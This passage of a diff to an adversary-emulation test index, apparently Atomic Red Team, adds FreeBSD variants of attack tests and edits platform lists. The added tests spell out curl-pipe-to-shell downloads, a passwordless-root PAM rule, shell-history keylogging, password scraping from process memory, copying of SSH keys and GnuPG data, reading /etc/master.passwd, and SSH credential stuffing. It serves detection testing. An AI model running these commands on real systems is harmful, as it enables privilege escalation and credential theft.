||||
- macos
|
||||
input_arguments:
|
||||
@@ -51055,7 +52774,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -51086,7 +52804,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -51301,9 +53018,8 @@ command-and-control:
|
||||
|
||||
Note that this test may conflict with pre-existing system configuration.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
proxy_server:
|
||||
description: Proxy server URL (host:port)
|
||||
@@ -51633,7 +53349,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -51663,7 +53378,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -51700,9 +53414,8 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
test_folder:
|
||||
description: Path used to store files.
|
||||
@@ -51873,6 +53586,36 @@ collection:
|
||||
|
||||
'
|
||||
name: bash
|
||||
- name: X Windows Capture (freebsd)
|
||||
auto_generated_guid: 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c
|
||||
description: 'Use xwd command to collect a full desktop screenshot and review
|
||||
file with xwud
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file path
|
||||
type: path
|
||||
default: "/tmp/T1113_desktop.xwd"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Package with XWD and XWUD must exist on device
|
||||
|
||||
'
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v xwd)" ]; then exit 0; else exit 1; fi
|
||||
if [ -x "$(command -v xwud)" ]; then exit 0; else exit 1; fi
|
||||
get_prereq_command: "pkg install -y xwd xwud \n"
|
||||
executor:
|
||||
command: |
|
||||
xwd -root -out #{output_file}
|
||||
xwud -in #{output_file}
|
||||
cleanup_command: 'rm #{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Capture Linux Desktop using Import Tool
|
||||
auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
|
||||
description: 'Use import command from ImageMagick to collect a full desktop
|
||||
@@ -51905,6 +53648,38 @@ collection:
|
||||
|
||||
'
|
||||
name: bash
|
||||
- name: Capture Linux Desktop using Import Tool (freebsd)
|
||||
auto_generated_guid: 18397d87-38aa-4443-a098-8a48a8ca5d8d
|
||||
description: 'Use import command from ImageMagick to collect a full desktop
|
||||
screenshot
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file path
|
||||
type: path
|
||||
default: "/tmp/T1113_desktop.png"
|
||||
dependencies:
|
||||
- description: 'ImageMagick must be installed
|
||||
|
||||
'
|
||||
prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit
|
||||
1; fi
|
||||
|
||||
'
|
||||
get_prereq_command: 'pkg install -y ImageMagick7
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'import -window root #{output_file}
|
||||
|
||||
'
|
||||
cleanup_command: 'rm #{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1557:
|
||||
technique:
|
||||
modified: '2023-03-30T21:01:37.568Z'
|
||||
@@ -52136,6 +53911,39 @@ collection:
|
||||
tail /var/log/syslog
|
||||
cleanup_command: 'unset PROMPT_COMMAND
|
||||
|
||||
'
|
||||
- name: Logging sh history to syslog/messages
|
||||
auto_generated_guid: b04284dc-3bd9-4840-8d21-61b8d31c99f2
|
||||
description: "There are several variables that can be set to control the appearance
|
||||
of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
|
||||
of these variables are executed as if they had been typed on the command line.
|
||||
The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
|
||||
and can be configured to write the latest \"bash history\" entries to the
|
||||
syslog.\n\nTo gain persistence the command could be added to the users .shrc
|
||||
or .profile \n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'This test requires to be run in a bash shell and that logger
|
||||
and tee are installed.
|
||||
|
||||
'
|
||||
prereq_command: |
|
||||
if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi
|
||||
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
|
||||
get_prereq_command: 'echo ""
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
PS2=`logger -t "$USER" -f ~/.sh_history`
|
||||
$PS2
|
||||
tail /var/log/messages
|
||||
cleanup_command: 'unset PS2
|
||||
|
||||
'
|
||||
- name: Bash session based keylogger
|
||||
auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
|
||||
@@ -52148,7 +53956,6 @@ collection:
|
||||
persistence the command could be added to the users .bashrc or .bash_aliases
|
||||
or the systems default .bashrc in /etc/skel/ \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
@@ -52615,6 +54422,35 @@ collection:
|
||||
|
||||
'
|
||||
name: bash
|
||||
- name: Stage data from Discovery.sh (freebsd)
|
||||
auto_generated_guid: 4fca7b49-379d-4493-8890-d6297750fa46
|
||||
description: 'Utilize curl to download discovery.sh and execute a basic information
|
||||
gathering shell script
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Location to save downloaded discovery.bat file
|
||||
type: path
|
||||
default: "/tmp/T1074.001_discovery.log"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if curl is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v curl)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y curl)\n"
|
||||
executor:
|
||||
command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
|
||||
| sh -s > #{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1114.001:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -53110,7 +54946,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_input_file:
|
||||
@@ -53147,7 +54982,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_input_file:
|
||||
@@ -53184,7 +55018,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_input_file:
|
||||
@@ -53221,7 +55054,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_input_file:
|
||||
@@ -57023,6 +58855,36 @@ credential-access:
|
||||
'
|
||||
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
- name: Malicious PAM rule (freebsd)
|
||||
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
|
||||
description: |
|
||||
Inserts a rule into a PAM config and then tests it.
|
||||
|
||||
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_pam_conf:
|
||||
description: PAM config file to modify.
|
||||
type: string
|
||||
default: "/etc/pam.d/su"
|
||||
pam_rule:
|
||||
description: Rule to add to the PAM config.
|
||||
type: string
|
||||
default: auth sufficient pam_succeed_if.so uid >= 0
|
||||
index:
|
||||
description: Index where the rule is inserted.
|
||||
type: integer
|
||||
default: 8
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
- name: Malicious PAM module
|
||||
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
|
||||
@@ -57230,6 +59092,39 @@ credential-access:
|
||||
tail /var/log/syslog
|
||||
cleanup_command: 'unset PROMPT_COMMAND
|
||||
|
||||
'
|
||||
- name: Logging sh history to syslog/messages
|
||||
auto_generated_guid: b04284dc-3bd9-4840-8d21-61b8d31c99f2
|
||||
description: "There are several variables that can be set to control the appearance
|
||||
of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
|
||||
of these variables are executed as if they had been typed on the command line.
|
||||
The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
|
||||
and can be configured to write the latest \"bash history\" entries to the
|
||||
syslog.\n\nTo gain persistence the command could be added to the users .shrc
|
||||
or .profile \n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'This test requires to be run in a bash shell and that logger
|
||||
and tee are installed.
|
||||
|
||||
'
|
||||
prereq_command: |
|
||||
if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi
|
||||
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
|
||||
get_prereq_command: 'echo ""
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
PS2=`logger -t "$USER" -f ~/.sh_history`
|
||||
$PS2
|
||||
tail /var/log/messages
|
||||
cleanup_command: 'unset PS2
|
||||
|
||||
'
|
||||
- name: Bash session based keylogger
|
||||
auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
|
||||
@@ -57242,7 +59137,6 @@ credential-access:
|
||||
persistence the command could be added to the users .bashrc or .bash_aliases
|
||||
or the systems default .bashrc in /etc/skel/ \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
@@ -57505,6 +59399,50 @@ credential-access:
|
||||
curl -s #{remote_url} |bash
|
||||
cleanup_command: 'userdel -fr art
|
||||
|
||||
'
|
||||
- name: SUDO Brute Force - FreeBSD
|
||||
auto_generated_guid: abcde488-e083-4ee7-bc85-a5684edd7541
|
||||
description: "An adversary may find themselves on a box (e.g. via ssh key auth,
|
||||
with no password) with a user that has sudo'ers privileges, but they do not
|
||||
know the users password. Normally, failed attempts to access root will not
|
||||
cause the root account to become locked, to prevent denial-of-service. This
|
||||
functionality enables an attacker to undertake a local brute force password
|
||||
guessing attack without locking out the root user. \n\nThis test creates the
|
||||
\"art\" user with a password of \"password123\", logs in, downloads and executes
|
||||
the sudo_bruteforce.sh which brute force guesses the password, then deletes
|
||||
the user\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
remote_url:
|
||||
description: url of remote payload
|
||||
type: url
|
||||
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if running on a FreeBSD based machine.
|
||||
|
||||
'
|
||||
prereq_command: |
|
||||
if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
|
||||
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
|
||||
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
|
||||
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
|
||||
if [ -x "$(command -v bash)" ]; then echo "bash is installed"; else echo "bash is NOT installed"; exit 1; fi
|
||||
get_prereq_command: 'pkg update && pkg install -y sudo curl bash
|
||||
|
||||
'
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: true
|
||||
command: |
|
||||
pw adduser art -g wheel -s /bin/sh
|
||||
echo "password123" | pw usermod art -h 0
|
||||
su art
|
||||
cd /tmp
|
||||
curl -s #{remote_url} |bash
|
||||
cleanup_command: 'rmuser -y art
|
||||
|
||||
'
|
||||
T1003:
|
||||
technique:
|
||||
@@ -58473,6 +60411,51 @@ credential-access:
|
||||
grep -i "PASS" "#{output_file}"
|
||||
cleanup_command: 'rm -f "#{output_file}"
|
||||
|
||||
'
|
||||
- name: Dump individual process memory with sh on FreeBSD (Local)
|
||||
auto_generated_guid: fa37b633-e097-4415-b2b8-c5bf4c86e423
|
||||
description: |
|
||||
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
|
||||
copy process memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
type: path
|
||||
default: "/tmp/T1003.007.bin"
|
||||
script_path:
|
||||
description: Path to script generating the target process
|
||||
type: path
|
||||
default: "/tmp/T1003.007.sh"
|
||||
pid_term:
|
||||
description: Unique string to use to identify target process
|
||||
type: string
|
||||
default: T1003.007
|
||||
dependencies:
|
||||
- description: 'Script to launch target process must exist
|
||||
|
||||
'
|
||||
prereq_command: |
|
||||
test -f #{script_path}
|
||||
grep "#{pid_term}" #{script_path}
|
||||
get_prereq_command: |
|
||||
echo '#!/bin/sh' > #{script_path}
|
||||
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
sh #{script_path}
|
||||
PID=$(pgrep -n -f "#{pid_term}")
|
||||
MEM_START=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f1)
|
||||
MEM_STOP=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f2)
|
||||
MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))
|
||||
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
|
||||
strings "#{output_file}" | grep -i PASS
|
||||
cleanup_command: 'rm -f "#{output_file}"
|
||||
|
||||
'
|
||||
- name: Dump individual process memory with Python (Local)
|
||||
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
|
||||
@@ -58481,7 +60464,6 @@ credential-access:
|
||||
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -58780,6 +60762,117 @@ credential-access:
|
||||
tshark -c 5 -i #{interface}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Packet Capture FreeBSD using tshark or tcpdump
|
||||
auto_generated_guid: c93f2492-9ebe-44b5-8b45-36574cccfe67
|
||||
description: |
|
||||
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
|
||||
|
||||
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
interface:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: string
|
||||
default: em0
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if at least one of tcpdump or tshark is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
|
||||
-v tshark)" ]; then exit 1; else exit 0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y wireshark-nox11)\n"
|
||||
executor:
|
||||
command: |
|
||||
tcpdump -c 5 -nnni #{interface}
|
||||
tshark -c 5 -i #{interface}
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Packet Capture FreeBSD using /dev/bpfN with sudo
|
||||
auto_generated_guid: e2028771-1bfb-48f5-b5e6-e50ee0942a14
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few
|
||||
seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: string
|
||||
default: em0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: string
|
||||
default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: string
|
||||
default: "/tmp/t1040_freebsd_pcapdemo"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
|
||||
auto_generated_guid: a3a0d4c9-c068-4563-a08d-583bd05b884c
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp''
|
||||
and captures packets for a few seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: string
|
||||
default: em0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: string
|
||||
default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: string
|
||||
default: "/tmp/t1040_freebsd_pcapdemo"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -f -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo
|
||||
auto_generated_guid: 10c710c9-9104-4d5f-8829-5b65391e2a29
|
||||
description: 'Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few
|
||||
@@ -60072,9 +62165,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
@@ -60116,6 +62208,41 @@ credential-access:
|
||||
exit 0
|
||||
cleanup_command: 'rm -rf #{output_folder}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Copy Private SSH Keys with CP (freebsd)
|
||||
auto_generated_guid: 12e4a260-a7fd-4ed8-bf18-1a28c1395775
|
||||
description: 'Copy private SSH keys on a FreeBSD system to a staging folder
|
||||
using the `cp` command.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
type: path
|
||||
default: "/"
|
||||
output_folder:
|
||||
description: Output folder containing copies of SSH private key files
|
||||
type: path
|
||||
default: "/tmp/art-staging"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Install GNU cp from coreutils package.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v gcp)" ]; then exit 1; else exit 0;
|
||||
fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y coreutils)\n"
|
||||
executor:
|
||||
command: |
|
||||
mkdir #{output_folder}
|
||||
find #{search_path} -name id_rsa 2>/dev/null -exec gcp --parents {} #{output_folder} \;
|
||||
cleanup_command: 'rm -rf #{output_folder}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Copy Private SSH Keys with rsync
|
||||
@@ -60143,6 +62270,41 @@ credential-access:
|
||||
exit 0
|
||||
cleanup_command: 'rm -rf #{output_folder}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Copy Private SSH Keys with rsync (freebsd)
|
||||
auto_generated_guid: 922b1080-0b95-42b0-9585-b9a5ea0af044
|
||||
description: 'Copy private SSH keys on a FreeBSD system to a staging folder
|
||||
using the `rsync` command.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
type: path
|
||||
default: "/"
|
||||
output_folder:
|
||||
description: Output folder containing copies of SSH private key files
|
||||
type: path
|
||||
default: "/tmp/art-staging"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if rsync is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v rsync)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y rsync)\n"
|
||||
executor:
|
||||
command: |
|
||||
mkdir #{output_folder}
|
||||
find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \;
|
||||
cleanup_command: 'rm -rf #{output_folder}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Copy the users GnuPG directory with rsync
|
||||
@@ -60170,6 +62332,41 @@ credential-access:
|
||||
exit 0
|
||||
cleanup_command: 'rm -rf #{output_folder}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Copy the users GnuPG directory with rsync (freebsd)
|
||||
auto_generated_guid: b05ac39b-515f-48e9-88e9-2f141b5bcad0
|
||||
description: 'Copy the users GnuPG (.gnupg) directory on a FreeBSD system to
|
||||
a staging folder using the `rsync` command.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from
|
||||
type: path
|
||||
default: "/"
|
||||
output_folder:
|
||||
description: Output folder containing a copy of the .gnupg directory
|
||||
type: path
|
||||
default: "/tmp/GnuPG"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if rsync is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v rsync)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y rsync)\n"
|
||||
executor:
|
||||
command: |
|
||||
mkdir #{output_folder}
|
||||
find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \;
|
||||
cleanup_command: 'rm -rf #{output_folder}
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1557.001:
|
||||
@@ -60929,6 +63126,32 @@ credential-access:
|
||||
command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
|
||||
#{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Search Through sh History
|
||||
auto_generated_guid: d87d3b94-05b4-40f2-a80f-99864ffa6803
|
||||
description: 'Search through sh history for specifice commands we want to capture
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
type: path
|
||||
default: "~/loot.txt"
|
||||
sh_history_grep_args:
|
||||
description: grep arguments that filter out specific commands we want to
|
||||
capture
|
||||
type: path
|
||||
default: "-e '-p ' -e 'pass' -e 'ssh'"
|
||||
sh_history_filename:
|
||||
description: Path of the sh history file to capture
|
||||
type: path
|
||||
default: "~/.history"
|
||||
executor:
|
||||
command: 'cat #{sh_history_filename} | grep #{sh_history_grep_args} > #{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1552.001:
|
||||
@@ -61017,7 +63240,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
@@ -61036,9 +63258,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
@@ -61056,9 +63277,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
@@ -62006,6 +64226,37 @@ credential-access:
|
||||
command: |
|
||||
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
|
||||
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
|
||||
- name: SSH Credential Stuffing From FreeBSD
|
||||
auto_generated_guid: a790d50e-7ebf-48de-8daa-d9367e0911d4
|
||||
description: 'Using username,password combination from a password dump to login
|
||||
over SSH.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
target_host:
|
||||
description: IP Address / Hostname you want to target.
|
||||
type: string
|
||||
default: localhost
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Requires SSHPASS
|
||||
|
||||
'
|
||||
prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
|
||||
1; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: 'pkg install -y sshpass
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
|
||||
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
|
||||
T1208:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -62559,11 +64810,29 @@ credential-access:
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Access /etc/master.passwd (Local)
|
||||
auto_generated_guid: 5076874f-a8e6-4077-8ace-9e5ab54114a5
|
||||
description: "/etc/master.passwd file is accessed in FreeBSD environments\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
type: path
|
||||
default: "/tmp/T1003.008.txt"
|
||||
executor:
|
||||
command: |
|
||||
sudo cat /etc/master.passwd > #{output_file}
|
||||
cat #{output_file}
|
||||
cleanup_command: 'rm -f #{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Access /etc/passwd (Local)
|
||||
auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
|
||||
description: "/etc/passwd file is accessed in FreeBSD and Linux environments\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -62585,7 +64854,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -62609,7 +64877,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -63692,7 +65959,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will stdout list of usernames.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -64280,7 +66546,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -64299,7 +66564,6 @@ discovery:
|
||||
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
|
||||
description: "(requires root)\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -64323,7 +66587,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -64346,7 +66609,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -64395,6 +66657,26 @@ discovery:
|
||||
cat #{output_file}
|
||||
cleanup_command: 'rm -f #{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Show if a user account has ever logged in remotely (freebsd)
|
||||
auto_generated_guid: 0f73418f-d680-4383-8a24-87bc97fe4e35
|
||||
description: 'Show if a user account has ever logged in remotely
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
